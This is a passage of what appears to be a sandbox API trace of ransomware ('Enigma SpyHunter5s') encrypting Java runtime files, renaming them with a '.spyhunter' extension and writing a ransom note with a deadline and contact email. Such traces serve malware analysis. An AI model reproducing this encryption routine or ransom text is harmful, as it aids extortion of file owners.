lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce48c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce48c*=0x2ac, lpOverlapped=0x0) returned 1 [0172.639] CloseHandle (hObject=0x9c) returned 1 [0172.639] GetProcessHeap () returned 0x2c0000 [0172.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf948 | out: hHeap=0x2c0000) returned 1 [0172.639] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce428 | out: pbBuffer=0x25ce428) returned 1 [0172.639] GetProcessHeap () returned 0x2c0000 [0172.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0172.639] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce420*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce420*=0x30) returned 1 [0172.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0172.641] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf") returned 52 [0172.641] StrStrW (lpFirst="PYCC.pf", lpSrch=".txt") returned 0x0 [0172.641] GetProcessHeap () returned 0x2c0000 [0172.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0172.641] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3e4*=0x2800, lpOverlapped=0x0) returned 1 [0172.924] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.924] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3e4*=0x2800, lpOverlapped=0x0) returned 1 [0172.924] GetProcessHeap () returned 0x2c0000 [0172.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0172.925] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.925] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce424*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x25ce424*, lpNumberOfBytesWritten=0x25ce3e4*=0x4, lpOverlapped=0x0) returned 1 [0173.008] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3e4*=0x30, lpOverlapped=0x0) returned 1 [0173.009] CloseHandle (hObject=0x9c) returned 1 [0173.010] GetProcessHeap () returned 0x2c0000 [0173.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.010] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf.spyhunter") returned 62 [0173.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\pycc.pf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\PYCC.pf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\pycc.pf.spyhunter")) returned 1 [0173.011] GetProcessHeap () returned 0x2c0000 [0173.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.011] GetProcessHeap () returned 0x2c0000 [0173.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0173.011] GetProcessHeap () returned 0x2c0000 [0173.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3930 | out: hHeap=0x2c0000) returned 1 [0173.011] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce428 | out: pbBuffer=0x25ce428) returned 1 [0173.011] GetProcessHeap () returned 0x2c0000 [0173.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0173.011] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce420*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce420*=0x30) returned 1 [0173.012] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0173.013] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar") returned 53 [0173.013] StrStrW (lpFirst="charsets.jar", lpSrch=".txt") returned 0x0 [0173.013] GetProcessHeap () returned 0x2c0000 [0173.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0173.013] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3e4*=0x2800, lpOverlapped=0x0) returned 1 [0173.368] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.368] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3e4*=0x2800, lpOverlapped=0x0) returned 1 [0173.369] GetProcessHeap () returned 0x2c0000 [0173.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0173.369] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.369] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce424*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x25ce424*, lpNumberOfBytesWritten=0x25ce3e4*=0x4, lpOverlapped=0x0) returned 1 [0173.444] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3e4*=0x30, lpOverlapped=0x0) returned 1 [0173.444] CloseHandle (hObject=0x9c) returned 1 [0173.444] GetProcessHeap () returned 0x2c0000 [0173.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.444] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.spyhunter") returned 63 [0173.444] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar.spyhunter")) returned 1 [0173.445] GetProcessHeap () returned 0x2c0000 [0173.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.445] GetProcessHeap () returned 0x2c0000 [0173.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0173.446] GetProcessHeap () returned 0x2c0000 [0173.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3708 | out: hHeap=0x2c0000) returned 1 [0173.446] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce420 | out: pbBuffer=0x25ce420) returned 1 [0173.446] GetProcessHeap () returned 0x2c0000 [0173.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0173.446] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce418*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce418*=0x30) returned 1 [0173.446] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0173.447] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties") returned 61 [0173.447] StrStrW (lpFirst="calendars.properties", lpSrch=".txt") returned 0x0 [0173.447] GetProcessHeap () returned 0x2c0000 [0173.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0173.447] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3dc*=0x4d0, lpOverlapped=0x0) returned 1 [0173.583] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffb30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.583] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x25ce3dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3dc*=0x4d0, lpOverlapped=0x0) returned 1 [0173.583] GetProcessHeap () returned 0x2c0000 [0173.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0173.583] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.583] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce41c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3dc, lpOverlapped=0x0 | out: lpBuffer=0x25ce41c*, lpNumberOfBytesWritten=0x25ce3dc*=0x4, lpOverlapped=0x0) returned 1 [0173.583] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3dc*=0x30, lpOverlapped=0x0) returned 1 [0173.583] CloseHandle (hObject=0x9c) returned 1 [0173.583] GetProcessHeap () returned 0x2c0000 [0173.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.584] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties.spyhunter") returned 71 [0173.584] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\calendars.properties.spyhunter")) returned 1 [0173.585] GetProcessHeap () returned 0x2c0000 [0173.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.585] GetProcessHeap () returned 0x2c0000 [0173.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0173.585] GetProcessHeap () returned 0x2c0000 [0173.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf880 | out: hHeap=0x2c0000) returned 1 [0173.585] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\applet\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\applet\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0173.586] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0173.586] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce353*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce47c, lpOverlapped=0x0 | out: lpBuffer=0x25ce353*, lpNumberOfBytesWritten=0x25ce47c*=0x127, lpOverlapped=0x0) returned 1 [0173.586] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0173.587] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce47c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce47c*=0x2ac, lpOverlapped=0x0) returned 1 [0173.587] CloseHandle (hObject=0x9c) returned 1 [0173.587] GetProcessHeap () returned 0x2c0000 [0173.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03c28 | out: hHeap=0x2c0000) returned 1 [0173.587] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce418 | out: pbBuffer=0x25ce418) returned 1 [0173.587] GetProcessHeap () returned 0x2c0000 [0173.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0173.587] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce410*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce410*=0x30) returned 1 [0173.587] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0173.588] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar") returned 51 [0173.588] StrStrW (lpFirst="alt-rt.jar", lpSrch=".txt") returned 0x0 [0173.588] GetProcessHeap () returned 0x2c0000 [0173.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0173.588] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3d4*=0x2800, lpOverlapped=0x0) returned 1 [0173.644] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.644] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3d4*=0x2800, lpOverlapped=0x0) returned 1 [0173.644] GetProcessHeap () returned 0x2c0000 [0173.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0173.644] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.644] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce414*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3d4, lpOverlapped=0x0 | out: lpBuffer=0x25ce414*, lpNumberOfBytesWritten=0x25ce3d4*=0x4, lpOverlapped=0x0) returned 1 [0173.704] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3d4*=0x30, lpOverlapped=0x0) returned 1 [0173.704] CloseHandle (hObject=0x9c) returned 1 [0173.704] GetProcessHeap () returned 0x2c0000 [0173.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.704] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.spyhunter") returned 61 [0173.704] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\alt-rt.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\alt-rt.jar.spyhunter")) returned 1 [0173.705] GetProcessHeap () returned 0x2c0000 [0173.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.705] GetProcessHeap () returned 0x2c0000 [0173.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0173.706] GetProcessHeap () returned 0x2c0000 [0173.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21e60 | out: hHeap=0x2c0000) returned 1 [0173.706] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce418 | out: pbBuffer=0x25ce418) returned 1 [0173.706] GetProcessHeap () returned 0x2c0000 [0173.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0173.706] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce410*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce410*=0x30) returned 1 [0173.706] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\t2k.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\t2k.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0173.716] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\t2k.dll") returned 48 [0173.716] StrStrW (lpFirst="t2k.dll", lpSrch=".txt") returned 0x0 [0173.716] GetProcessHeap () returned 0x2c0000 [0173.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0173.716] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3d4*=0x2800, lpOverlapped=0x0) returned 1 [0173.824] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.824] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3d4*=0x2800, lpOverlapped=0x0) returned 1 [0173.824] GetProcessHeap () returned 0x2c0000 [0173.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0173.824] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.824] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce414*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3d4, lpOverlapped=0x0 | out: lpBuffer=0x25ce414*, lpNumberOfBytesWritten=0x25ce3d4*=0x4, lpOverlapped=0x0) returned 1 [0173.826] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3d4*=0x30, lpOverlapped=0x0) returned 1 [0173.826] CloseHandle (hObject=0x9c) returned 1 [0173.826] GetProcessHeap () returned 0x2c0000 [0173.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.826] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\t2k.dll.spyhunter") returned 58 [0173.826] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\t2k.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\t2k.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\t2k.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\t2k.dll.spyhunter")) returned 1 [0173.827] GetProcessHeap () returned 0x2c0000 [0173.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.827] GetProcessHeap () returned 0x2c0000 [0173.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0173.827] GetProcessHeap () returned 0x2c0000 [0173.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21c50 | out: hHeap=0x2c0000) returned 1 [0173.827] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce410 | out: pbBuffer=0x25ce410) returned 1 [0173.827] GetProcessHeap () returned 0x2c0000 [0173.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0173.827] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce408*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce408*=0x30) returned 1 [0173.827] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ssvagent.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssvagent.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0173.829] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ssvagent.exe") returned 53 [0173.829] StrStrW (lpFirst="ssvagent.exe", lpSrch=".txt") returned 0x0 [0173.829] GetProcessHeap () returned 0x2c0000 [0173.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0173.829] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce3cc*=0x2800, lpOverlapped=0x0) returned 1 [0173.830] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.830] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce3cc*=0x2800, lpOverlapped=0x0) returned 1 [0173.830] GetProcessHeap () returned 0x2c0000 [0173.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0173.830] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.830] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce40c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3cc, lpOverlapped=0x0 | out: lpBuffer=0x25ce40c*, lpNumberOfBytesWritten=0x25ce3cc*=0x4, lpOverlapped=0x0) returned 1 [0173.831] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3cc*=0x30, lpOverlapped=0x0) returned 1 [0173.831] CloseHandle (hObject=0x9c) returned 1 [0173.831] GetProcessHeap () returned 0x2c0000 [0173.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.831] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\ssvagent.exe.spyhunter") returned 63 